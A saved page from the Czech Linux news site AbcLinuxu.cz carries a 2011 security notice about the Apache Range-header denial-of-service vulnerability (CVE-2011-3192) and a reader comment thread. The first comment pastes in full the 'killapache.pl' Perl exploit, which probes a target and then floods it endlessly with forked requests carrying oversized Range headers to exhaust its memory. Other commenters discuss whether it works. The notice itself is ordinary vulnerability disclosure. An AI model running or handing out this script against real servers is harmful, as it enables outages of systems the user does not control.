abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 13:22 | Upozornění

    Turris OS má aktuálně problém s aktualizací související s ukončením podpory protokolu OCSP u certifikační autority Let's Encrypt.

    Ladislav Hagara | Komentářů: 2
    dnes 04:00 | Zajímavý článek

    Nevidomý uživatel Linuxu v blogu upozornil na tristní stav přístupnosti na linuxovém desktopu (část první, druhá, závěr), přičemž stížnosti jsou podobné jako v roce 2022. Vyvolal bouřlivou odezvu. Následně např. Georges Stavracas shrnul situaci v GNOME. Debata o jiném aspektu přístupnosti, emulaci vstupu pod Waylandem, také proběhla na Redditu.

    Fluttershy, yay! | Komentářů: 7
    dnes 03:00 | Komunita

    DevConf.CZ 2025, tj. open source komunitní konference sponzorovaná společností Red Hat, proběhne od 12. do 14. června v Brně na FIT VUT. Publikován byl program a spuštěna byla registrace.

    Ladislav Hagara | Komentářů: 0
    včera 18:22 | Nová verze

    Byla vydána nová major verze 28.0 programovacího jazyka Erlang (Wikipedie) a související platformy OTP (Open Telecom Platform, Wikipedie). Přehled novinek v příspěvku na blogu.

    Ladislav Hagara | Komentářů: 0
    včera 13:11 | Zajímavý článek

    Český telekomunikační úřad zveřejnil Výroční zprávu za rok 2024 (pdf), kde shrnuje své aktivity v loňském roce a přináší i základní popis situace na trhu. Celkový objem přenesených mobilních dat za rok 2024 dosáhl dle odhadu hodnoty přibližně 1,73 tis. PB a jeho meziroční nárůst činí zhruba 30 %. Průměrná měsíční spotřeba dat na datovou SIM kartu odhadem dosáhla 12,5 GB – v předchozím roce šlo o 9,8 GB.

    Ladislav Hagara | Komentářů: 12
    včera 12:33 | IT novinky

    Z novinek představených na Google I/O 2025: Přehledy od AI (AI Overviews) se rozšiřují do dalších zemí. Užitečné, syntetizované přehledy od generativní AI jsou nově k dispozici i českým uživatelům Vyhledávače.

    Ladislav Hagara | Komentářů: 0
    včera 11:44 | IT novinky

    Šestice firem označovaných jako „MAMAAN“ – tedy Meta (Facebook, Instagram), Alphabet (Google), Microsoft, Apple, Amazon a Netflix – je zodpovědná za více než padesát procent světového internetového provozu. Dalšími velkými hráči jsou TikTok a Disney+. Společně tak zásadně určují podobu digitálního prostředí, spotřebitelského chování i budoucích trendů v oblasti technologií. I přesto, že se podíl těchto gigantů od roku 2023 o něco snížil, jejich dominantní postavení zvyšuje volání po regulaci.

    Ladislav Hagara | Komentářů: 6
    včera 11:33 | IT novinky

    Evropská komise (EK) navrhuje zavést plošný poplatek ve výši dvou eur (zhruba 50 Kč) za každý malý balík vstupující do Evropské unie. Poplatek se má týkat balíků v hodnotě do 150 eur (zhruba 3700 Kč), které v EU nepodléhají clu. V loňském roce bylo do EU doručeno kolem 4,6 miliardy takovýchto balíků. Poplatek má krýt náklady na kontroly rostoucího počtu zásilek levného zboží, které pochází především z Číny.

    Ladislav Hagara | Komentářů: 28
    20.5. 18:11 | IT novinky

    Dnes a zítra probíhá vývojářská konference Google I/O 2025. Sledovat lze na YouTube a na síti 𝕏 (#GoogleIO).

    Ladislav Hagara | Komentářů: 0
    20.5. 15:22 | Komunita

    V Bostonu probíhá konference Red Hat Summit 2025. Vybrané přednášky lze sledovat na YouTube. Dění lze sledovat na síti 𝕏 (#RHSummit).

    Ladislav Hagara | Komentářů: 0
    Jaký je váš oblíbený skriptovací jazyk?
     (56%)
     (28%)
     (7%)
     (3%)
     (0%)
     (0%)
     (7%)
    Celkem 72 hlasů
     Komentářů: 6, poslední dnes 14:43
    Rozcestník

    DoS zranitelnost webového serveru Apache

    Byla objevena DoS zranitelnost webového serveru Apache (Range header DoS vulnerability Apache HTTPD 1.3/2.x, CVE-2011-3192, Bugtraq ID: 49303). V oficiálním bezpečnostním upozornění se uvádí 5 doporučení pro zmírnění dopadů útoků. Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána do 48 hodin.

    25.8.2011 19:20 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    25.8.2011 21:39 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    #By Kingcope
    #Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use Parallel::ForkManager;
    
    sub usage {
    	print "Apache Remote Denial of Service (memory exhaustion)\n";
    	print "by Kingcope\n";
    	print "usage: perl killapache.pl <host> [numforks]\n";
    	print "example: perl killapache.pl www.example.com 50\n";
    }
    
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    =09
    $pm =3D new Parallel::ForkManager($numforks);
    
    $|=3D1;
    srand(time());
    $p =3D "";
    for ($k=3D0;$k<1300;$k++) {
    	$p .=3D ",5-$k";
    }
    
    for ($k=3D0;$k<$numforks;$k++) {
    my $pid =3D $pm->start and next; =09
    =09
    $x =3D "";
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    while(<$sock>) {
    }
     $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
    }
    
    sub testapache {
    my $sock =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
                                     PeerPort =3D> "80",
                         			 Proto    =3D> 'tcp');
    
    $p =3D "HEAD / HTTP/1.1\r\nHost: =
    $ARGV[0]\r\nRange:bytes=3D0-$p\r\nAccept-Encoding: gzip\r\nConnection: =
    close\r\n\r\n";
    print $sock $p;
    
    $x =3D <$sock>;
    if ($x =3D~ /Partial/) {
    	print "host seems vuln\n";
    	return 1;=09
    } else {
    	return 0;=09
    }
    }
    
    if ($#ARGV < 0) {
    	usage;
    	exit;=09
    }
    
    if ($#ARGV > 1) {
    	$numforks =3D $ARGV[1];
    } else {$numforks =3D 50;}
    
    $v =3D testapache();
    if ($v =3D=3D 0) {
    	print "Host does not seem vulnerable\n";
    	exit;=09
    }
    while(1) {
    killapache();
    }
    
    NN
    25.8.2011 21:43 NN
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110820/848b4dca/attachment.obj
    25.8.2011 22:09 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Utoci to a... nic sa nedeje. Aspon na mojom serveri.
    MMMMMMMMM avatar 25.8.2011 22:28 MMMMMMMMM | skóre: 44 | blog: unstable | Valašsko :-)
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Host does not seem vulnerable (to vidím zase já, když "útočím" na své servery)
    25.8.2011 22:38 aa
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Skus nejaky vacsi subor, potom to bude posielat po 50 paketoch a nic z toho.
    pepe_ avatar 25.8.2011 22:43 pepe_ | skóre: 48
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru

    A funguje to i s lighttpd/mysql/php5 s cgifixem ?

    26.8.2011 19:07 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Aktualizace bezpečnostního upozornění.
    Problémem je nejenom 'Range' header ale také 'Range-Request' header.
    Oficiální bezpečnostní záplata nebo nová verze webového serveru bude vydána snad do 24 hodin.
    Otto Šabart avatar 27.8.2011 01:10 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: DoS zranitelnost webového serveru Apache
    Exploit vyšel na exploit-db.com už před 8 dny... No zkoušel jsem ho a také mi nefunguje.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.